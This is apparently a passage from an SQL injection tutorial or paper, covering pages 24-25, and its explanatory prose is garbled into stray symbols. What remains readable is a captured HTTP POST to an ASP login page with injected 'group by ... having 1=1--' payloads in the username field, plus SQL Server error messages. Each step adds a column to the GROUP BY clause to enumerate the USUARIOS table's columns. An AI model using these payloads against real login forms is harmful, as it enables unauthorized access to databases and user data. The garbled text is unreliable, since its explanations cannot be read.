24. 3
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UserID' is invalid in the select
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
! * KK " " " & " )" 6 9
" 4 " & 6 :,-' #$% # 6 " 6 6 )
) ) " " ( * " " . .
E # 5 :#F& "= ) 7 " E " ,F
5 9 " ) ) & " * " = &
" 6 6 " " * 4 < + ( " " * "
" "& " " " ) # 5 :#
H " 9 = " * " 6 !:#;
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx
=COUNTRYNAME=Argentina
txtUsuario=%27group+by+usuarios.UserID+having+1%3D1--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. "
H + L. )+ " " " , 6 . V 00
% . 4 6 " = & 6 " " .
"
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column 'USUARIOS.UID' is invalid in the select
25. ?
list because it is not contained in an aggregate function
and there is no GROUP BY clause.
/Login.asp, line 85
6 ( " " " & " 9 " " > 6 .>
" 6 ( " >. )+> " )
+ " , ) # 5 :#& " " ,
# . " .= & " " " " " +
" " 9 ) # 5 :# ( "
> . " > * " " "& "
> 6 > " ) " + 8" " =
*
'group by usuarios.UserID,usuarios.UID having 1=1--
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Nombre' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85
*
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1—
#! ! *
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'[Microsoft][ODBC SQL Server Driver][SQL
Server]Column USUARIOS.Email' is invalid in the select
list because it is not contained in an aggregate function
or the GROUP BY clause.
/Login.asp, line 85